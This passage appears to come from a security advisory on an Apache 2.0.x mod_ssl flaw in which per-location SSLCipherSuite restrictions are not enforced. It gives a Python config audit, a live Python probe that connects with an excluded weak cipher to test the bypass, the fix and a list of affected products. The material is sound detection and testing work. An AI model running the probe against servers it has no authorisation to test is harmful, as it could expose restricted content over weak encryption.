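The two conditions described above (an affected 2.0.x build, and an SSLCipherSuite inside a Directory or Location container) can both be checked from the configuration before anything is put on the wire. The Python script below is an added example, not code from Apache or from any of the advisories on this page. It walks an httpd configuration, records every SSLCipherSuite together with the container it sits in, pairs each per-location list with the list the enclosing virtual host (or the main server) actually enforces, and combines that with the version from `httpd -v`. The sample configuration, the `httpd -v` output and the names `Finding`, `Audit` and `audit` are this example's own.

```python
"""Audit an Apache httpd configuration for the CVE-2004-0885 pattern.

Added example; not code from Apache or from any of the advisories above.
Apache 2.0.35 through 2.0.52 did not enforce an SSLCipherSuite placed in a
<Directory>, <Location> or <Files> container: a client could reach that
location with any cipher the enclosing virtual host accepts.  This script
lists such per-location directives and pairs each with the cipher list the
enclosing virtual host (or the main server) actually enforces, then combines
that with the server version.  The sample config and `httpd -v` output at
the bottom are constructed for illustration.
"""
import re
from dataclasses import dataclass, field

# Containers that give a directive per-directory (per-location) scope.
PER_DIR = {"directory", "directorymatch", "location", "locationmatch",
           "files", "filesmatch"}
VULN_RANGE = ((2, 0, 35), (2, 0, 52))        # inclusive, per the advisory

_OPEN = re.compile(r"^<(\w+)\s*([^>]*)>$")   # <Location /secure>
_CLOSE = re.compile(r"^</(\w+)>$")           # </Location>


@dataclass
class Finding:
    container: str       # e.g. 'Location /secure'
    cipher_suite: str    # the restricted list that is NOT enforced
    vhost: str           # enclosing <VirtualHost ...> or 'server config'
    vhost_ciphers: str   # the list a client can really negotiate
    line: int


@dataclass
class Audit:
    version: tuple
    vulnerable_version: bool
    findings: list = field(default_factory=list)

    @property
    def exposed(self):
        """Both conditions for the bypass hold."""
        return self.vulnerable_version and bool(self.findings)


def parse_version(httpd_v_output):
    """(major, minor, patch) from the output of `httpd -v`."""
    m = re.search(r"Apache/(\d+)\.(\d+)\.(\d+)", httpd_v_output)
    if not m:
        raise ValueError("no Apache version string found")
    return tuple(int(x) for x in m.groups())


def version_affected(version):
    return VULN_RANGE[0] <= version <= VULN_RANGE[1]


def find_per_dir_cipher_suites(config_text):
    """One Finding per SSLCipherSuite inside a per-directory container."""
    entries = []            # (scope, container or None, value, line)
    stack = []              # open containers as (name, args)
    for lineno, raw in enumerate(config_text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # '#' starts a comment
        if not line:
            continue
        if m := _OPEN.match(line):
            stack.append((m.group(1), m.group(2).strip()))
            continue
        if m := _CLOSE.match(line):
            if stack and stack[-1][0].lower() == m.group(1).lower():
                stack.pop()
            continue
        parts = line.split(None, 1)
        if parts[0].lower() != "sslciphersuite" or len(parts) < 2:
            continue
        vhosts = [c for c in stack if c[0].lower() == "virtualhost"]
        per_dir = [c for c in stack if c[0].lower() in PER_DIR]
        scope = f"VirtualHost {vhosts[-1][1]}" if vhosts else "server config"
        container = " ".join(per_dir[-1]) if per_dir else None
        entries.append((scope, container, parts[1].strip(), lineno))
    # httpd merges by scope, not by file order, so resolve scope lists first.
    enforced = {s: v for s, c, v, _ in entries if c is None}
    return [Finding(container=c, cipher_suite=v, vhost=s,
                    vhost_ciphers=enforced.get(s) or enforced.get("server config")
                    or "(mod_ssl default list)", line=n)
            for s, c, v, n in entries if c is not None]


def audit(httpd_v_output, config_text):
    version = parse_version(httpd_v_output)
    return Audit(version, version_affected(version),
                 find_per_dir_cipher_suites(config_text))


# Constructed sample input, not a real deployment.
SAMPLE_HTTPD_V = "Server version: Apache/2.0.52\nServer built:   Sep 28 2004"
SAMPLE_CONFIG = """
SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP
<VirtualHost _default_:443>
    ServerName www.example.test
    SSLEngine on
    <Location /secure>
        # Intended: strong ciphers only.  Not enforced on 2.0.35-2.0.52.
        SSLCipherSuite HIGH:!ADH:!EXP:!LOW
        SSLRequireSSL
    </Location>
</VirtualHost>
<VirtualHost 10.0.0.5:443>
    ServerName intranet.example.test
    SSLEngine on
    <Directory "/var/www/intranet/hr">
        SSLCipherSuite HIGH:!ADH
    </Directory>
    SSLCipherSuite HIGH:MEDIUM:!ADH
</VirtualHost>
"""

if __name__ == "__main__":
    report = audit(SAMPLE_HTTPD_V, SAMPLE_CONFIG)
    print("version", ".".join(map(str, report.version)),
          "affected" if report.vulnerable_version else "not affected")
    for f in report.findings:
        print(f"line {f.line}: <{f.container}> wants {f.cipher_suite!r} "
              f"but clients of {f.vhost} may use {f.vhost_ciphers!r}")
    print("EXPOSED" if report.exposed else "not exposed")
```

The second virtual host in the sample deliberately places its own SSLCipherSuite after the Directory block: httpd merges directives by scope rather than file order, so the audit resolves scope-level lists before judging the per-directory ones. On an affected build the useful remediation is to move the strong cipher list up to the virtual host (or to serve the restricted content from its own virtual host), since the per-location copy is the part that is not enforced.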

- Exploit

An exploit is not required to leverage this issue.
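No exploit is needed because an ordinary TLS client that offers only a cipher the virtual host accepts will do: if the restricted path is served over that cipher, the per-location list is not being applied (mod_ssl applies a per-location cipher list by renegotiating the session, which is why the test has to read the full response). The probe below is an added example, not code from the advisories or from Apache. Host, port, path and the cipher name are assumptions supplied on the command line; the cipher must be one the virtual host accepts but the location excludes, and the script should only be run against a server you are authorised to test. Only the offline helpers (`build_request`, `parse_status`, `verdict`) run without a server.

```python
"""Live check for CVE-2004-0885: does the server really honour a
per-location SSLCipherSuite, or can a client reach the location with any
cipher the virtual host accepts?

Added example; not code from Apache or from the advisories above.  It
assumes a test server you are authorised to probe, a PATH whose <Location>
or <Directory> restricts ciphers, and one CIPHER (OpenSSL name) that the
virtual host accepts but that location excludes.  Only the offline helpers
(build_request, parse_status, verdict) are exercised without a server;
probe() needs a live listener.
"""
import socket
import ssl


def build_request(host, path):
    """Minimal HTTP/1.0 GET; HTTP/1.0 makes the server close after one response."""
    return (f"GET {path} HTTP/1.0\r\nHost: {host}\r\n"
            "Connection: close\r\n\r\n").encode("ascii")


def parse_status(response):
    """HTTP status code from a raw response, or None if the status line is malformed."""
    status_line = response.split(b"\r\n", 1)[0].split()
    if (len(status_line) >= 2 and status_line[0].startswith(b"HTTP/")
            and status_line[1].isdigit()):
        return int(status_line[1])
    return None


def verdict(handshake_ok, status):
    """Classify one probe made with the cipher the location is meant to reject."""
    if not handshake_ok:
        return ("inconclusive: no TLS session with this cipher "
                "(refused by the virtual host, or no connection at all)")
    if status == 200:
        return "BYPASS: restricted location served over an excluded cipher"
    if status == 403:
        return "enforced: server refused the excluded cipher for this location"
    if status is None:
        return ("enforced (probably): connection failed after the initial handshake, "
                "consistent with a rejected renegotiation; confirm in the error log")
    return f"unexpected status {status}: inspect manually"


def probe(host, port, path, cipher, timeout=10.0):
    """Offer only `cipher`, request `path`; return (handshake_ok, status, negotiated)."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False            # lab server, self-signed cert is fine
    ctx.verify_mode = ssl.CERT_NONE
    # Apache 2.0 speaks at most TLS 1.0, and renegotiation (which mod_ssl uses
    # to apply a per-location cipher list) does not exist in TLS 1.3.  Legacy
    # ciphers also need the OpenSSL security level lowered (OpenSSL 1.1.0+
    # syntax); a build without TLS 1.0 support will reject minimum_version.
    ctx.minimum_version = ssl.TLSVersion.TLSv1
    ctx.maximum_version = ssl.TLSVersion.TLSv1_2
    ctx.set_ciphers(f"{cipher}:@SECLEVEL=0")
    handshake_ok, negotiated, chunks = False, None, []
    try:
        with socket.create_connection((host, port), timeout=timeout) as raw:
            with ctx.wrap_socket(raw, server_hostname=host) as tls:
                handshake_ok = True
                negotiated = tls.cipher()[0]
                tls.sendall(build_request(host, path))
                while chunk := tls.recv(4096):   # reading drives any renegotiation
                    chunks.append(chunk)
    except OSError:                                # ssl.SSLError is an OSError
        if not chunks:
            return handshake_ok, None, negotiated
    return handshake_ok, parse_status(b"".join(chunks)), negotiated


if __name__ == "__main__":
    import sys
    # e.g. python probe.py www.example.test 443 /secure RC4-MD5  (all hypothetical)
    host, port, path, cipher = sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4]
    ok, status, negotiated = probe(host, port, path, cipher)
    print(f"negotiated={negotiated} status={status}: {verdict(ok, status)}")
```

Run it twice: once with a cipher the location allows (expect 200, which confirms the path and credentials are right) and once with a cipher only the virtual host allows. A 200 on the second run is the bypass; a 403, or a connection that dies after the initial handshake, means the server rejected the renegotiation as it should.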

- Solution

Apache 2.0.53 is not affected by this issue; the Apache Software Foundation has released Apache version 2.0.53, which addresses it.

Please see the referenced vendor advisories for further information.


Products for which vendor updates are listed:

Sun Solaris 10
Sun Solaris 10.0_x86
Conectiva Linux 10.0
Apple Mac OS X Server 10.3.9
VMWare ESX Server 2.0.1
VMWare ESX Server 2.1.1
VMWare ESX Server 2.1.2
Apache Software Foundation Apache 2.0.35
Apache Software Foundation Apache 2.0.36
Apache Software Foundation Apache 2.0.37
Apache Software Foundation Apache 2.0.38
Apache Software Foundation Apache 2.0.39
Apache Software Foundation Apache 2.0.40
Apache Software Foundation Apache 2.0.41
Apache Software Foundation Apache 2.0.43
Apache Software Foundation Apache 2.0.44
Apache Software Foundation Apache 2.0.45
Apache Software Foundation Apache 2.0.46
Apache Software Foundation Apache 2.0.47
Apache Software Foundation Apache 2.0.48
Apache Software Foundation Apache 2.0.49
Apache Software Foundation Apache 2.0.50
Apache Software Foundation Apache 2.0.52
mod_ssl mod_ssl 2.8.9
mod_ssl mod_ssl 2.8.12
mod_ssl mod_ssl 2.8.15
IBM Hardware Management Console (HMC) for iSeries 3.3.2
